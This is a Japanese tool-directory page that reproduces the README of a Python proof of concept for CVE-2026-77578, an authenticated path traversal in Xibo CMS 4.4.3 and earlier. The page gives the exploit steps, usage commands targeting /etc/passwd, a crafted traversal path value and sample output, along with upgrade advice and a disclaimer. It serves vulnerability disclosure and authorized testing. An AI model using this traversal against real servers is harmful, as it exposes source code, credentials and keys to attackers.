Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/soskalai/cve-2026-77578
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubsoskalai/cve-2026-77578

CVE-2026-77578

Pythonの概念実証コード。Xibo CMSにおける認証済みパストラバーサルの脆弱性CVE-2026-77578を悪用し、細工されたXMLテンプレートのインポートを通じて任意のローカルファイルを読み取ります。

リポジトリを見る
11日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-77578 — Xibo CMS 任意のローカルファイル読み取り

概要

CVE-2026-77578 は、Xibo CMS における認証済みの任意のローカルファイル読み取り脆弱性です。

管理者権限またはモジュールテンプレートへのアクセス権を持つ認証済みユーザーが、トラバーサルシーケンスを含むパスベースのアセットを含む細工された XML テンプレートをインポートできます。その後、生成されたアセットにモジュールアセットエンドポイントを通じてアクセスでき、Xibo が参照されたローカルファイルの内容を返します。

影響を受けるバージョンと修正済みバージョン

  • 影響を受ける: Xibo CMS <= 4.4.3
  • 修正済み: Xibo CMS >= 4.4.4
  • 推奨される修復: Xibo CMS 4.4.4 以降にアップグレードしてください。

脆弱性の詳細

  • CVE: CVE-2026-77578
  • GHSA: GHSA-pc3g-2hhm-46qc
  • 脆弱性の種類: CWE-22 — パストラバーサル
  • 認証: 必要
  • 必要な権限: Developer Template 機能へのアクセス
  • 深刻度: 高
  • CVSS v3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
  • 影響: Web サーバーユーザーがアクセス可能なファイルの読み取り

概念実証

公式 Xibo アドバイザリ

Xibo はこの脆弱性を GHSA-pc3g-2hhm-46qc として公開し、バージョン <= 4.4.3 が影響を受け、>= 4.4.4 が修正済みであることを確認しました。アドバイザリは 高 の深刻度を CVSS v3.1 スコア 8.8 で割り当て、CVE-2026-77578 を特定しています。

提供された Python PoC は悪用プロセスを自動化します:

  1. Xibo CMS に認証します。
  2. Module Templates ページから CSRF トークンを取得します。
  3. 一意のアセット識別子を生成します。
  4. /developer/template/import を通じて細工された XML テンプレートをアップロードします。
  5. XML には相対パストラバーサルシーケンスを使用したパスベースのアセットが含まれています。
  6. /module/asset/<asset-id> を通じて生成されたアセットをリクエストします。
  7. 要求されたローカルファイルの内容を表示します。

使用方法

root@kitploit:~
python3 poc.py <URL> -u <USERNAME> -p <PASSWORD> -f <FILE>

例:

root@kitploit:~
python3 poc.py http://localhost \
    -u xibo_admin \
    -p password \
    -f /etc/passwd

別の例:

root@kitploit:~
python3 poc.py http://localhost \
    -u xibo_admin \
    -p password \
    -f /etc/os-release

-f オプションのデフォルトは /etc/passwd です。

出力例

以下は /etc/passwd の取得に成功した例です:

root@kitploit:~
==============================================
 FILE CONTENT
==============================================

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

CVE-2026-77578 PoC Output

技術的フロー

root@kitploit:~
Authenticated User
        |
        v
GET /developer/template/view
        |
        v
Extract X-XSRF-TOKEN
        |
        v
POST /developer/template/import
        |
        |  Crafted XML
        |  path="../../../../../etc/passwd"
        v
Xibo creates the asset
        |
        v
GET /module/asset/<asset-id>
        |
        v
Contents of local file returned

検証

この脆弱性は、ローカルの Xibo CMS 4.4.3 テスト環境において、以下のものを含む複数のファイルに対して正常に検証されました:

  • /etc/passwd
  • /etc/hosts
  • /etc/os-release
  • /var/www/cms/web/index.php

PHP ソースファイルのテストは、この問題が単なるシステムメタデータだけでなく、アプリケーションのソースコードを返すことが可能であることを示しています。

影響

悪用に成功すると、必要な Module Templates 権限を持つ認証済み攻撃者が、Xibo アプリケーションプロセスがアクセス可能な任意のファイルを読み取ることができます。

デプロイメントによっては、以下が露出する可能性があります:

  • アプリケーションのソースコード
  • 設定ファイル
  • 認証情報
  • API キー
  • データベース接続情報
  • その他の機密性の高いファイルシステムデータ

免責事項

この概念実証は、許可されたセキュリティ研究および防御的テストの目的のみに提供されています。

所有しているか、評価の明示的な許可を得ているシステムのみをテストしてください。

リポジトリ構造

root@kitploit:~
CVE-2026-77578/
├── poc.py
├── README.md
├── LICENSE
├── .gitignore
└── screenshots/
    └── poc-output.png
ツールをダウンロード